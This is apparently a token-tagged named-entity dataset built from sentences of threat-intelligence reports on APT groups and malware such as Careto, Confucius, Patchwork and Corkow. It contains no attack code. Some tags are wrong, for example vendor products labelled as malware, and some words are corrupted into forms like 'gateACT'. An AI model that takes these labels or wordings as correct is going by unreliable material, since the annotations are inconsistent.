+CVE-2012-0773 S-VULID
+was O
+originally O
+discovered O
+by O
+VUPEN O
+and O
+has O
+an O
+interesting O
+story O
+. O
+
+In O
+other O
+words O
+, O
+the O
+attackers O
+attracted O
+our O
+attention O
+by O
+attempting O
+to O
+exploit S-VULNAME
+Kaspersky B-MAL
+Lab I-MAL
+products E-MAL
+. O
+
+We O
+initially O
+became O
+aware O
+of O
+Careto S-FILE
+when O
+we O
+observed O
+attempts O
+to O
+exploit S-VULNAME
+a O
+vulnerability O
+in O
+our O
+products O
+to O
+make O
+the O
+malware O
+" O
+invisible O
+" O
+in O
+the O
+system O
+. O
+
+Most O
+modules O
+were O
+created O
+in O
+2012 S-TIME
+. O
+
+The O
+attackers O
+began O
+taking O
+them O
+offline O
+in O
+January B-TIME
+2014 E-TIME
+. O
+
+Last O
+week O
+we O
+discussed O
+Numbered B-APT
+Panda E-APT
+, O
+a O
+group O
+that O
+is O
+also O
+based O
+out O
+of O
+China S-LOC
+and O
+is O
+fairly O
+well O
+known O
+to O
+the O
+security B-SECTEAM
+community E-SECTEAM
+, O
+though O
+by O
+many O
+names O
+. O
+
+We O
+revealed O
+a O
+Chinese-based S-LOC
+adversary O
+we O
+crypt O
+as O
+Anchor B-APT
+Panda E-APT
+, O
+a O
+group O
+with O
+very O
+specific O
+tactics O
+, O
+techniques O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+and O
+a O
+keen O
+interest O
+in O
+maritime O
+operations O
+and O
+naval S-IDTY
+and O
+aerospace B-IDTY
+technology E-IDTY
+. O
+
+The O
+campaign O
+was O
+active O
+until O
+January B-TIME
+2014 E-TIME
+, O
+but O
+during O
+our O
+investigations O
+the O
+C&C S-TOOL
+servers O
+were O
+shut O
+down O
+. O
+
+This O
+week O
+we O
+are O
+going O
+to O
+discuss O
+Clever O
+Kitten O
+, O
+whom O
+, O
+by O
+virtue O
+of O
+several O
+indicators O
+, O
+we O
+have O
+affiliated O
+with O
+the O
+Islamic B-LOC
+Republic I-LOC
+of I-LOC
+Iran E-LOC
+. O
+
+Clever B-APT
+Kitten E-APT
+has O
+moved O
+to O
+leveraging O
+strategic B-ACT
+web I-ACT
+compromises E-ACT
+. O
+
+Clever B-APT
+Kitten E-APT
+actors O
+have O
+a O
+strong O
+affinity O
+for O
+PHP O
+server-side O
+attacks O
+to O
+make O
+access O
+; O
+this O
+is O
+relatively O
+unique O
+amongst O
+targeted O
+attackers O
+who O
+often O
+favor O
+targeting O
+a O
+specific O
+individual S-IDTY
+at O
+a O
+specific O
+organization O
+using O
+social B-IDTY
+engineering E-IDTY
+. O
+
+Clever B-APT
+Kitten E-APT
+primarily O
+targets O
+global O
+companies O
+with O
+strategic O
+importance O
+to O
+countries O
+that O
+are O
+contrary O
+to O
+Iranian O
+interests O
+. O
+
+A O
+Clever B-APT
+Kitten E-APT
+attack O
+starts O
+with O
+the O
+use O
+of O
+a O
+web B-MAL
+vulnerability I-MAL
+scanner E-MAL
+to O
+conduct O
+reconnaissance O
+. O
+
+The O
+scanner O
+was O
+identified O
+as O
+the O
+Acunetix B-FILE
+Web I-FILE
+Vulnerability I-FILE
+Scanner E-FILE
+which O
+is O
+a O
+commercial O
+penetration O
+testing O
+tool O
+that O
+is O
+readily O
+available O
+as O
+a O
+14-day O
+trial O
+. O
+
+Once O
+an O
+exploitable O
+page O
+is O
+identified O
+, O
+Clever O
+Kitten O
+will O
+attempt O
+to O
+upload O
+a O
+PHP O
+backdoor O
+to O
+gain O
+remote O
+access O
+to O
+the O
+system O
+. O
+
+The O
+reason O
+for O
+this O
+is O
+likely O
+the O
+availability O
+of O
+exploits O
+against O
+web O
+browsers O
+, O
+which O
+for O
+a O
+variety O
+of O
+reasons O
+allows O
+an O
+attacker O
+to O
+bypass O
+security O
+features O
+such O
+as O
+Data B-TOOL
+Execution I-TOOL
+Prevention E-TOOL
+( O
+DEP S-TOOL
+) O
+or O
+Address B-TOOL
+Space I-TOOL
+Layout I-TOOL
+Randomization E-TOOL
+( O
+ASLR S-TOOL
+) O
+. O
+
+Once O
+an O
+exploitable O
+page O
+is O
+identified O
+, O
+the O
+actor O
+will O
+attempt O
+to O
+upload O
+a O
+PHP O
+backdoor O
+to O
+gain O
+remote O
+access O
+to O
+the O
+system O
+. O
+
+In O
+Clever O
+Kitten O
+'s O
+attacks O
+, O
+the O
+goal O
+is O
+lateral O
+movement O
+; O
+this O
+is O
+an O
+attempt O
+to O
+move O
+further O
+into O
+the O
+target O
+environment O
+in O
+order O
+to O
+begin O
+intelligence O
+collection O
+. O
+
+This O
+activity O
+is O
+a O
+longer O
+tail O
+for O
+the O
+actor O
+than O
+a O
+spearphish S-ACT
+; O
+this O
+is O
+likely O
+based O
+on O
+the O
+Clever O
+Kitten O
+background O
+, O
+which O
+may O
+be O
+focused O
+on O
+web O
+development/application O
+testing O
+. O
+
+Without O
+going O
+too O
+deep O
+into O
+the O
+rabbit O
+hole O
+, O
+there O
+are O
+several O
+indicators O
+pointing O
+to O
+an O
+Iranian O
+nexus O
+, O
+including O
+language O
+artifacts O
+in O
+the O
+tool-marks O
+used O
+by O
+the O
+attacker O
+, O
+as O
+well O
+as O
+network B-ACT
+activity E-ACT
+tying O
+this O
+actor O
+to O
+a O
+very O
+specific O
+location O
+that O
+we O
+have O
+high O
+confidence O
+in O
+not O
+being O
+spoofed O
+. O
+
+Clever B-APT
+Kitten E-APT
+'s O
+goal O
+is O
+to O
+eventually O
+be O
+able O
+to O
+masquerade O
+as O
+a O
+legitimate O
+user O
+by O
+compromising O
+credentials O
+either O
+through O
+a O
+pass-the-hash B-ACT
+attack E-ACT
+, O
+or O
+by O
+dumping O
+password O
+hashes O
+from O
+a O
+compromised O
+host O
+. O
+
+The O
+campaign O
+targets O
+Middle B-LOC
+Eastern E-LOC
+organizations O
+largely O
+from O
+the O
+Lebanon S-LOC
+and O
+United S-LOC
+Arab S-IDTY
+Emirates S-IDTY
+, O
+though O
+, O
+Indian S-LOC
+and O
+Canadian S-LOC
+companies O
+with O
+interests O
+in O
+those O
+Middle B-LOC
+Eastern E-LOC
+countries O
+are O
+also O
+targeted O
+. O
+
+There O
+are O
+new O
+TTPs O
+used O
+in O
+this O
+attack O
+– O
+for O
+example O
+Agent_Drable O
+is O
+leveraging O
+the O
+Django S-MAL
+Python S-TOOL
+framework O
+for O
+command O
+and O
+control O
+infrastructure O
+, O
+the O
+technical O
+details O
+of O
+which O
+are O
+outlined O
+later O
+in O
+the O
+blog O
+. O
+
+n O
+summary O
+, O
+Cold O
+River O
+is O
+a O
+sophisticated O
+threat O
+actor O
+making O
+malicious O
+use O
+of O
+DNS B-MAL
+tunneling E-MAL
+for O
+command B-ACT
+and I-ACT
+control I-ACT
+activities E-ACT
+, O
+compelling O
+lure O
+documents O
+, O
+and O
+previously O
+unknown O
+implants O
+. O
+
+Some O
+of O
+the O
+exploit S-VULNAME
+server O
+paths O
+contain O
+modules O
+that O
+appear O
+to O
+have O
+been O
+designed O
+to O
+infect O
+Linux S-OS
+computers O
+, O
+but O
+we O
+have O
+not O
+yet O
+located O
+the O
+Linux S-OS
+backdoor O
+. O
+
+The O
+campaign O
+targets O
+Middle O
+Eastern O
+organizations O
+largely O
+from O
+the O
+Lebanon S-LOC
+and O
+United S-LOC
+Arab B-IDTY
+Emirates E-IDTY
+, O
+though O
+, O
+Indian S-LOC
+and O
+Canadian S-LOC
+companies O
+with O
+interests O
+in O
+those O
+Middle B-LOC
+Eastern E-LOC
+countries O
+may O
+have O
+also O
+been O
+targeted O
+. O
+
+The O
+decoy B-MAL
+documents E-MAL
+used O
+by O
+the O
+InPage S-TOOL
+exploits S-VULNAME
+suggest O
+that O
+the O
+targets O
+are O
+likely O
+to O
+be O
+politically S-IDTY
+or O
+militarily S-IDTY
+motivated O
+. O
+
+The O
+use O
+of O
+InPage S-MAL
+as O
+an O
+attack O
+vector O
+is O
+not O
+commonly O
+seen O
+, O
+with O
+the O
+only O
+previously O
+noted O
+attacks O
+being O
+documented O
+by O
+Kaspersky S-SECTEAM
+in O
+late B-TIME
+2016 E-TIME
+. O
+
+The O
+decoy B-FILE
+documents E-FILE
+dropped O
+suggest O
+that O
+the O
+targets O
+are O
+likely O
+to O
+be O
+politically S-IDTY
+or O
+militarily S-IDTY
+motivated O
+, O
+with O
+subjects O
+such O
+as O
+Intelligence O
+reports O
+and O
+political S-IDTY
+situations O
+being O
+used O
+as O
+lure O
+documents O
+. O
+
+While O
+documents O
+designed O
+to O
+exploit S-VULNAME
+the O
+InPage B-MAL
+software E-MAL
+are O
+rare O
+, O
+they O
+are O
+not O
+new O
+– O
+however O
+in O
+recent O
+weeks O
+Unit42 S-SECTEAM
+has O
+observed O
+numerous O
+InPage S-TOOL
+exploits S-VULNAME
+leveraging O
+similar O
+shellcode O
+, O
+suggesting O
+continued O
+use O
+of O
+the O
+exploit S-VULNAME
+previously O
+discussed O
+by O
+Kaspersky S-SECTEAM
+. O
+
+Confucius O
+targeted O
+a O
+particular O
+set O
+of O
+individuals O
+in O
+South O
+Asian O
+countries O
+, O
+such O
+as O
+military B-IDTY
+personnel E-IDTY
+and O
+businessmen S-IDTY
+, O
+among O
+others O
+. O
+
+Tweety B-MAL
+Chat E-MAL
+'s O
+Android S-OS
+version O
+can O
+record O
+audio O
+, O
+too O
+. O
+
+Confucius' O
+operations O
+include O
+deploying O
+bespoke O
+backdoors O
+and O
+stealing O
+files O
+from O
+their O
+victim O
+'s O
+systems O
+with O
+tailored O
+file O
+stealers O
+, O
+some O
+of O
+which O
+bore O
+resemblances O
+to O
+Patchwork S-APT
+'s O
+. O
+
+Compared O
+to O
+Patchwork S-APT
+, O
+whose O
+Trojanized O
+documents O
+exploit S-VULNAME
+at O
+least O
+five O
+security O
+flaws O
+, O
+Confucius' O
+backdoors O
+are O
+delivered O
+through O
+Office O
+files O
+exploiting O
+memory O
+corruption O
+vulnerabilities O
+CVE-2015-1641 S-VULID
+and O
+CVE-2017-11882 S-VULID
+. O
+
+Back O
+in O
+February O
+, O
+we O
+noted O
+the O
+similarities O
+between O
+the O
+Patchwork S-APT
+and O
+Confucius B-APT
+groups E-APT
+and O
+found O
+that O
+, O
+in O
+addition O
+to O
+the O
+similarities O
+in O
+their O
+malware O
+code O
+, O
+both O
+groups O
+primarily O
+went O
+after O
+targets O
+in O
+South B-LOC
+Asia E-LOC
+. O
+
+Back O
+in O
+February S-TIME
+, O
+Trend B-SECTEAM
+Micro E-SECTEAM
+noted O
+the O
+similarities O
+between O
+the O
+Patchwork S-APT
+and O
+Confucius B-APT
+groups E-APT
+and O
+found O
+that O
+, O
+in O
+addition O
+to O
+the O
+similarities O
+in O
+their O
+malware O
+code O
+, O
+both O
+groups O
+primarily O
+went O
+after O
+targets O
+in O
+South S-LOC
+Asia S-LOC
+. O
+
+One O
+of O
+its O
+file O
+stealers O
+, O
+swissknife2 S-MAL
+, O
+abuses O
+a O
+cloud O
+storage O
+service O
+as O
+a O
+repository O
+of O
+exfiltrated O
+files O
+. O
+
+During O
+the O
+months O
+that O
+followed O
+in O
+which O
+we O
+tracked O
+Confucius' B-ACT
+activities E-ACT
+, O
+we O
+found O
+that O
+they O
+were O
+still O
+aiming O
+for O
+Pakistani O
+targets O
+. O
+
+During O
+their O
+previous O
+campaign O
+, O
+we O
+found O
+Confucius O
+using O
+fake O
+romance O
+websites O
+to O
+entice O
+victims O
+into O
+installing O
+malicious O
+Android S-OS
+applications O
+. O
+
+Periodically O
+, O
+the O
+malware O
+tries O
+to O
+contact O
+the O
+command-and-control S-TOOL
+( O
+C&C S-TOOL
+) O
+server O
+with O
+the O
+username O
+encoded O
+into O
+parameters O
+. O
+
+This O
+function O
+is O
+similar O
+to O
+the O
+various O
+versions O
+of O
+backdoors O
+( O
+such O
+as O
+sctrls S-MAL
+and O
+sip_telephone S-MAL
+) O
+that O
+we O
+analyzed O
+in O
+our O
+previous O
+blog O
+post O
+and O
+whitepaper O
+. O
+
+This O
+algorithm O
+was O
+previously O
+discussed O
+by O
+security O
+researchers O
+in O
+a O
+Confucius-related O
+blog O
+post O
+. O
+
+Lately O
+, O
+Patchwork S-APT
+has O
+been O
+sending O
+multiple O
+RTF B-FILE
+files E-FILE
+exploiting O
+CVE-2017-8570 S-VULID
+. O
+
+The O
+group O
+still O
+uses O
+the O
+Badnews S-MAL
+malware S-MAL
+, O
+a O
+backdoor O
+with O
+information-stealing O
+and O
+file-executing O
+capabilities O
+, O
+albeit O
+updated O
+with O
+a O
+slight O
+modification O
+in O
+the O
+encryption O
+routine O
+at O
+the O
+end O
+of O
+2017 S-TIME
+, O
+when O
+they O
+added O
+Blowfish O
+encryption O
+on O
+top O
+of O
+their O
+custom O
+encryption O
+described O
+in O
+our O
+former O
+Patchwork S-APT
+blogpost O
+. O
+
+Threat O
+actors O
+like O
+Confucius S-APT
+and O
+Patchwork S-APT
+are O
+known O
+for O
+their O
+large O
+arsenal O
+of O
+tools O
+and O
+ever-evolving O
+techniques O
+that O
+can O
+render O
+traditional O
+security O
+solutions O
+— O
+which O
+are O
+often O
+not O
+designed O
+to O
+handle O
+the O
+persistent O
+and O
+sophisticated O
+threats O
+detailed O
+in O
+this O
+blog O
+— O
+ineffective O
+. O
+
+The O
+reality O
+is O
+that O
+IT B-IDTY
+departments E-IDTY
+of O
+small O
+to O
+large-sized O
+organizations O
+are O
+not O
+equipped O
+to O
+handle O
+the O
+more O
+advanced O
+threats O
+that O
+groups O
+like O
+Confucius O
+use O
+in O
+their O
+attacks O
+. O
+
+Patchwork S-APT
+uses O
+email S-ACT
+as O
+an O
+entry O
+point O
+, O
+which O
+is O
+why O
+securing O
+the O
+email B-ACT
+gateACT E-ACT
+is O
+important O
+. O
+
+This O
+blog O
+post O
+examines O
+two O
+similar O
+malware O
+families O
+that O
+utilize O
+the O
+aforementioned O
+technique O
+to O
+abuse O
+legitimate O
+websites O
+, O
+their O
+connections O
+to O
+each O
+other O
+, O
+and O
+their O
+connections O
+to O
+known O
+espionage B-ACT
+campaigns E-ACT
+. O
+
+In O
+order O
+to O
+increase O
+the O
+likelihood O
+of O
+their O
+malware O
+successfully O
+communicating O
+home O
+, O
+Cyber B-ACT
+Espionage E-ACT
+threat O
+actors O
+are O
+increasingly O
+abusing B-ACT
+legitimate I-ACT
+web I-ACT
+services E-ACT
+, O
+in O
+lieu O
+of O
+DNS B-ACT
+lookups E-ACT
+to O
+retrieve O
+a O
+command O
+and O
+control O
+address O
+. O
+
+In O
+2013 S-TIME
+, O
+Rapid7 S-SECTEAM
+reported O
+on O
+a O
+series O
+of O
+relatively O
+amateur O
+attacks O
+against O
+Pakistani O
+targets O
+. O
+
+The O
+first O
+of O
+which O
+we O
+call O
+' O
+CONFUCIUS_A S-FILE
+' O
+, O
+a O
+malware O
+family O
+that O
+has O
+links O
+to O
+a O
+series O
+of O
+attacks O
+associated O
+with O
+a O
+backdoor B-ACT
+attack E-ACT
+method O
+commonly O
+known O
+as O
+SNEEPY S-MAL
+( O
+aka O
+ByeByeShell S-MAL
+) O
+first O
+reported O
+by O
+Rapid7 S-SECTEAM
+in O
+2013 S-TIME
+. O
+
+At O
+first O
+glance O
+CONFUCIUS_B S-FILE
+looks O
+very O
+similar O
+to O
+CONFUCIUS_A S-FILE
+, O
+and O
+they O
+are O
+also O
+packaged O
+in O
+plain O
+SFX B-MAL
+binary I-MAL
+files E-MAL
+. O
+
+The O
+CONFUCIUS_B S-FILE
+executable O
+is O
+disguised O
+as O
+a O
+PowerPoint O
+presentation O
+, O
+using O
+a O
+Right-To-Left-Override S-TOOL
+( O
+RTLO S-TOOL
+) O
+trick O
+and O
+a O
+false O
+icon O
+. O
+
+We O
+also O
+believe O
+that O
+both O
+clusters O
+of O
+activity O
+have O
+links O
+to O
+attacks O
+with O
+likely O
+Indian O
+origins O
+, O
+the O
+CONFUCIUS_A B-ACT
+attacks E-ACT
+are O
+linked O
+to O
+the O
+use O
+of O
+SNEEPY/BYEBYESHELL S-MAL
+and O
+the O
+CONFUCIUS_B S-FILE
+have O
+a O
+loose O
+link O
+to O
+Hangover S-MAL
+. O
+
+The O
+two O
+malware O
+families O
+themselves O
+are O
+also O
+very O
+similar O
+, O
+and O
+therefore O
+we O
+think O
+that O
+the O
+shared O
+technique O
+is O
+an O
+indication O
+of O
+a O
+single O
+developer O
+, O
+or O
+development B-IDTY
+company E-IDTY
+, O
+behind O
+both O
+CONFUCIUS_A S-FILE
+and O
+CONFUCIUS_B S-FILE
+. O
+
+In O
+this O
+blog O
+post O
+, O
+we O
+discussed O
+two O
+separate O
+malware O
+variations O
+that O
+behave O
+in O
+very O
+similar O
+ACTs O
+and O
+use O
+similar O
+techniques O
+to O
+acquire O
+a O
+C2 S-TOOL
+address O
+, O
+with O
+both O
+using O
+Yahoo O
+Answers O
+and O
+Quora O
+to O
+evade O
+traditional O
+mechanisms O
+for O
+blocking O
+command O
+and O
+control O
+domains O
+. O
+
+The O
+Android B-FILE
+version E-FILE
+, O
+for O
+instance O
+, O
+can O
+steal O
+SMS O
+messages O
+, O
+accounts O
+, O
+contacts O
+, O
+and O
+files O
+, O
+as O
+well O
+as O
+record O
+audio O
+. O
+
+Confucius' B-MAL
+backdoors E-MAL
+are O
+delivered O
+through O
+Office O
+documents O
+exploiting O
+memory O
+corruption O
+vulnerabilities O
+CVE-2015-1641 S-VULID
+and O
+CVE-2017-11882 S-VULID
+. O
+
+We O
+dove O
+deeper O
+into O
+Confucius' O
+operations—namely O
+, O
+the O
+malware-ridden O
+documents O
+, O
+backdoors O
+, O
+and O
+file O
+stealers O
+they O
+use O
+in O
+their O
+campaigns S-ACT
+. O
+
+The O
+sctrls B-MAL
+backdoor E-MAL
+we O
+came O
+across O
+is O
+delivered O
+via O
+RTF B-ACT
+files E-ACT
+exploiting O
+CVE-2015-1641 S-VULID
+. O
+
+The O
+documents O
+that O
+exploit S-VULNAME
+CVE2017-11882 S-VULID
+download O
+another O
+payload O
+— O
+an O
+HTML B-TOOL
+Application E-TOOL
+( O
+HTA S-TOOL
+) O
+file O
+toting O
+a O
+malicious O
+Visual B-TOOL
+Basic E-TOOL
+( O
+VBS S-TOOL
+) O
+script O
+— O
+from O
+the O
+server O
+, O
+which O
+is O
+executed O
+accordingly O
+by O
+the O
+command-line O
+tool O
+mshta.exe S-FILE
+. O
+
+In O
+August B-TIME
+2015 E-TIME
+a O
+new O
+incident O
+related O
+to O
+the O
+Corkow S-MAL
+( O
+Metel S-APT
+) O
+Trojan S-MAL
+was O
+detected O
+. O
+
+Corkow S-MAL
+provided O
+remote B-ACT
+access E-ACT
+to O
+the O
+ITS-Broker O
+system O
+terminal O
+by O
+《 O
+Platforma O
+soft O
+》 O
+Ltd. O
+, O
+which O
+enabled O
+the O
+fraud O
+to O
+be O
+committed O
+. O
+
+According O
+to O
+our O
+statistics O
+, O
+as O
+of O
+the O
+beginning O
+of O
+2015 S-TIME
+this O
+botnet B-FILE
+encompassed E-FILE
+over O
+250 O
+000 O
+infected O
+devices O
+worldwide O
+including O
+infecting O
+more O
+than O
+100 O
+financial B-IDTY
+institutions E-IDTY
+with O
+80% O
+of O
+them O
+from O
+the O
+top O
+20 O
+list O
+. O
+
+The O
+interest O
+among O
+hackers O
+in O
+targeting O
+trading O
+systems O
+is O
+expected O
+to O
+grow O
+. O
+
+Russian-speaking S-LOC
+hackers O
+are O
+believed O
+to O
+be O
+responsible O
+for O
+these O
+attacks O
+and O
+used O
+the O
+Corkow B-MAL
+Trojan E-MAL
+. O
+
+Hackers O
+target O
+primarily B-IDTY
+companies E-IDTY
+in O
+Russia O
+and O
+CIS O
+countries O
+, O
+though O
+it O
+is O
+noticed O
+that O
+the O
+amount O
+of O
+attacks O
+targeting O
+the O
+USA O
+has O
+increased O
+5 O
+times O
+since O
+2011 S-TIME
+. O
+
+One O
+of O
+the O
+first O
+botnets O
+specializing O
+in O
+targeting O
+the O
+trading O
+software O
+called O
+Quik S-MAL
+was O
+" O
+Ranbyus S-MAL
+" O
+, O
+created O
+in O
+2012 S-TIME
+. O
+
+As O
+of O
+the O
+Group-IB S-SECTEAM
+investigation O
+of O
+this O
+malware O
+program O
+in O
+March B-TIME
+2015 E-TIME
+, O
+Corkow S-MAL
+v.7.118.1.1 O
+had O
+not O
+been O
+detected O
+by O
+a O
+single O
+antivirus O
+program O
+. O
+
+Hackers O
+gained O
+access O
+to O
+a O
+computer O
+in O
+the O
+trading O
+system O
+in O
+September B-TIME
+2014 E-TIME
+. O
+
+Starting O
+in O
+December O
+2014 O
+, O
+the O
+criminal O
+group O
+began O
+running O
+keyloggers S-MAL
+in O
+the O
+infected O
+system O
+. O
+
+To O
+spread O
+the O
+Corkow O
+malware O
+criminals O
+use O
+a O
+drive-by O
+downloads O
+method O
+, O
+when O
+victims O
+are O
+infected O
+while O
+visiting O
+compromised O
+legitimate O
+websites O
+. O
+
+Group-IB S-SECTEAM
+specialists O
+detected O
+various O
+sites O
+used O
+by O
+criminals O
+to O
+spread O
+the O
+Trojan S-MAL
+: O
+mail B-MAL
+tracking I-MAL
+websites E-MAL
+, O
+news B-MAL
+portals E-MAL
+, O
+electronic B-MAL
+books E-MAL
+, O
+computer B-MAL
+graphics I-MAL
+resources E-MAL
+, O
+music B-MAL
+portals E-MAL
+, O
+etc O
+. O
+
+Hackers O
+use O
+the O
+exploits O
+" O
+Nitris B-VULNAME
+Exploit I-VULNAME
+Kit E-VULNAME
+" O
+( O
+earlier O
+known O
+as O
+CottonCastle S-VULNAME
+) O
+, O
+which O
+is O
+not O
+available O
+in O
+open O
+sources O
+and O
+sold O
+only O
+to O
+trusted O
+users O
+. O
+
+Group-IB S-SECTEAM
+Bot-trek O
+TDS O
+sensors O
+are O
+in O
+place O
+at O
+a O
+number O
+of O
+financial B-IDTY
+institutions E-IDTY
+and O
+, O
+unfortunately O
+, O
+we O
+register O
+that O
+currently O
+Corkow S-MAL
+malware S-MAL
+is O
+present O
+on O
+80% O
+of O
+protected O
+corporate O
+systems O
+. O
+
+Considering O
+the O
+Trojan S-MAL
+delivery O
+method O
+and O
+through O
+our O
+analysis O
+of O
+infections O
+on O
+banks' O
+networks O
+, O
+we O
+can O
+confirm O
+that O
+all O
+infections O
+were O
+conducted O
+on O
+a O
+random O
+basis O
+. O
+
+According O
+to O
+statistics O
+, O
+Corkow S-MAL
+primarily O
+targets O
+users S-IDTY
+in O
+Russia O
+and O
+the O
+CIS O
+, O
+but O
+it O
+is O
+worth O
+noting O
+that O
+in O
+2014 S-TIME
+the O
+amount O
+of O
+attacks O
+targeting O
+the O
+USA O
+increased O
+by O
+5 O
+times O
+, O
+in O
+comparison O
+with O
+2011 S-TIME
+. O
+
+Moreover O
+, O
+the O
+number O
+of O
+Corkow S-MAL
+incidents O
+detected O
+in O
+Q1 O
+2015 S-TIME
+in O
+the O
+United O
+States O
+exceeds O
+the O
+number O
+of O
+those O
+in O
+the O
+CIS O
+countries O
+. O
+
+Moreover O
+, O
+the O
+number O
+of O
+Corkow S-MAL
+incidents O
+detected O
+in O
+Q1 O
+2015 S-TIME
+in O
+the O
+United B-LOC
+States E-LOC
+exceeds O
+the O
+number O
+of O
+those O
+in O
+the O
+CIS O
+countries O
+. O
+
+Hackers O
+first O
+actively O
+spread O
+bots O
+using O
+the O
+Niteris S-TOOL
+exploit S-VULNAME
+, O
+and O
+then O
+search O
+for O
+infected O
+devices O
+at O
+banks S-IDTY
+amongst O
+their O
+bots O
+by O
+analyzing O
+IP S-PROT
+addresses O
+, O
+cracked O
+passwords O
+and O
+results O
+of O
+the O
+modules O
+performance O
+. O
+
+In O
+addition O
+to O
+the O
+legitimate O
+AmmyAdmin B-MAL
+tool E-MAL
+, O
+the O
+hackers O
+used O
+Visconti B-MAL
+Backdoor E-MAL
+developed O
+based O
+on O
+legitimate O
+RMS S-TOOL
+( O
+remote B-TOOL
+manipulator I-TOOL
+system E-TOOL
+) O
+software O
+. O
+
+If O
+a O
+bot S-FILE
+was O
+installed O
+on O
+a O
+network O
+that O
+was O
+of O
+interest O
+to O
+the O
+hacking O
+group O
+, O
+this O
+bot O
+was O
+then O
+used O
+to O
+upload O
+one O
+of O
+the O
+remote O
+access O
+programs O
+. O
+
+To O
+obtain O
+logins O
+and O
+passwords O
+they O
+applied O
+keyloggers S-MAL
+built O
+into O
+Corkow S-MAL
+, O
+as O
+well O
+as O
+a O
+commonly O
+used O
+feature O
+of O
+Mimikatz O
+, O
+dumping O
+clear O
+text O
+Windows S-OS
+credentials O
+from O
+LSA O
+. O
+
+Hackers O
+used O
+the O
+remote B-ACT
+access E-ACT
+to O
+detect O
+servers O
+of O
+their O
+interest O
+in O
+the O
+internal O
+network O
+. O
+
+In O
+2015 S-TIME
+, O
+the O
+Metel O
+gang O
+began O
+to O
+target O
+banks S-IDTY
+and O
+financial B-IDTY
+institutions E-IDTY
+directly O
+. O
+
+Metel S-MAL
+is O
+a O
+banking S-IDTY
+Trojan S-MAL
+( O
+also O
+known O
+as O
+Corkow S-MAL
+) O
+discovered O
+in O
+2011 S-TIME
+when O
+it O
+was O
+used O
+to O
+attack O
+users O
+of O
+online O
+banking O
+services O
+. O
+
+After O
+the O
+infection O
+stage O
+, O
+criminals O
+move O
+laterally O
+with O
+the O
+help O
+of O
+legitimate O
+and O
+pentesting O
+tools O
+, O
+stealing O
+passwords O
+from O
+their O
+initial O
+victims O
+( O
+entry O
+point O
+) O
+to O
+gain O
+access O
+to O
+the O
+computers O
+within O
+the O
+organization O
+that O
+have O
+access O
+to O
+money O
+transactions O
+. O
+
+With O
+this O
+level O
+of O
+access O
+, O
+the O
+gang O
+has O
+been O
+able O
+to O
+pull O
+off O
+a O
+clever O
+trick O
+by O
+automating O
+the O
+rollback B-ACT
+of I-ACT
+ATM I-ACT
+transactions E-ACT
+. O
+
+COVELLITE O
+operates O
+globally O
+with O
+targets O
+primarily O
+in O
+Europe S-LOC
+, O
+East B-LOC
+Asia E-LOC
+, O
+and O
+North B-LOC
+America E-LOC
+. O
+
+US S-LOC
+targets O
+emerged O
+in O
+September B-TIME
+2017 E-TIME
+with O
+a O
+small O
+, O
+targeted O
+phishing B-ACT
+campaign E-ACT
+directed O
+at O
+select O
+U.S. S-LOC
+electric B-IDTY
+companies E-IDTY
+. O
+
+LAZARUS O
+GROUP O
+is O
+responsible O
+for O
+attacks O
+ranging O
+from O
+the O
+2014 S-TIME
+attack O
+on O
+Sony B-IDTY
+Pictures E-IDTY
+to O
+a O
+number O
+of O
+Bitcoin S-TOOL
+heists O
+in O
+2017 S-TIME
+. O
+
+Technical O
+analysis O
+of O
+COVELLITE S-MAL
+malware S-MAL
+indicates O
+an O
+evolution O
+from O
+known O
+LAZARUS B-MAL
+toolkits E-MAL
+. O
+
+COVELLITE O
+remains O
+active O
+but O
+appears O
+to O
+have O
+abandoned O
+North O
+American O
+targets O
+, O
+with O
+indications O
+of O
+activity O
+in O
+Europe S-LOC
+and O
+East B-LOC
+Asia E-LOC
+. O
+
+Given O
+the O
+group O
+'s O
+specific O
+interest O
+in O
+infrastructure O
+operations O
+, O
+rapidly O
+improving O
+capabilities O
+, O
+and O
+history O
+of O
+aggressive O
+targeting O
+, O
+Dragos S-SECTEAM
+considers O
+this O
+group O
+a O
+primary O
+threat O
+to O
+the O
+ICS B-IDTY
+industry E-IDTY
+. O
+
+Delivering O
+a O
+backdoor O
+and O
+spyware O
+, O
+this O
+campaign O
+was O
+designed O
+to O
+steal O
+information O
+from O
+infected O
+systems O
+using O
+a O
+malware O
+client O
+capable O
+of O
+filtering O
+out O
+" O
+uninteresting O
+" O
+files O
+, O
+and O
+spread O
+primarily O
+via O
+a O
+targeted O
+phishing B-ACT
+email E-ACT
+usually O
+promising O
+a O
+pornographic O
+video O
+. O
+
+Lookout S-SECTEAM
+researchers O
+have O
+discovered O
+a O
+new O
+mobile O
+surveillanceware O
+family O
+, O
+FrozenCell S-MAL
+. O
+
+The O
+threat O
+is O
+likely O
+targeting O
+employees S-IDTY
+of O
+various O
+Palestinian S-LOC
+government B-IDTY
+agencies E-IDTY
+, O
+security B-IDTY
+services E-IDTY
+, O
+Palestinian O
+students S-IDTY
+, O
+and O
+those O
+affiliated O
+with O
+the O
+Fatah B-IDTY
+political I-IDTY
+party E-IDTY
+. O
+
+Delivering O
+a O
+backdoor O
+and O
+spyware O
+, O
+Desert O
+Falcons O
+'s O
+campaign O
+was O
+designed O
+to O
+steal O
+information O
+from O
+infected O
+systems O
+using O
+a O
+malware O
+client O
+capable O
+of O
+filtering O
+out O
+" O
+uninteresting O
+" O
+files O
+, O
+and O
+spread O
+primarily O
+via O
+a O
+targeted O
+phishing B-ACT
+email E-ACT
+usually O
+promising O
+a O
+pornographic O
+video O
+. O
+
+FrozenCell S-MAL
+is O
+the O
+mobile O
+component O
+of O
+a O
+multi-platform B-ACT
+attack E-ACT
+we've O
+seen O
+a O
+threat O
+actor O
+known O
+as O
+" O
+Two-tailed O
+Scorpion/APT-C-23 S-APT
+" O
+, O
+use O
+to O
+spy O
+on O
+victims O
+through O
+compromised O
+mobile O
+devices O
+and O
+desktops O
+. O
+
+This O
+threat O
+is O
+another O
+proof O
+point O
+that O
+attackers O
+are O
+clearly O
+incorporating O
+the O
+mobile B-MAL
+device E-MAL
+into O
+their O
+surveillance B-ACT
+campaigns E-ACT
+as O
+a O
+primary O
+attack O
+vector O
+. O
+
+Desert B-APT
+Falcons E-APT
+is O
+keenly O
+aware O
+of O
+the O
+information O
+they O
+can O
+derive O
+from O
+these O
+devices O
+and O
+are O
+using O
+multi-stage O
+( O
+phishing S-ACT
++ O
+an O
+executable O
+) O
+, O
+multi-platform O
+( O
+Android S-OS
++ O
+desktop O
+) O
+attacks O
+to O
+accomplish O
+their O
+spying O
+. O
+
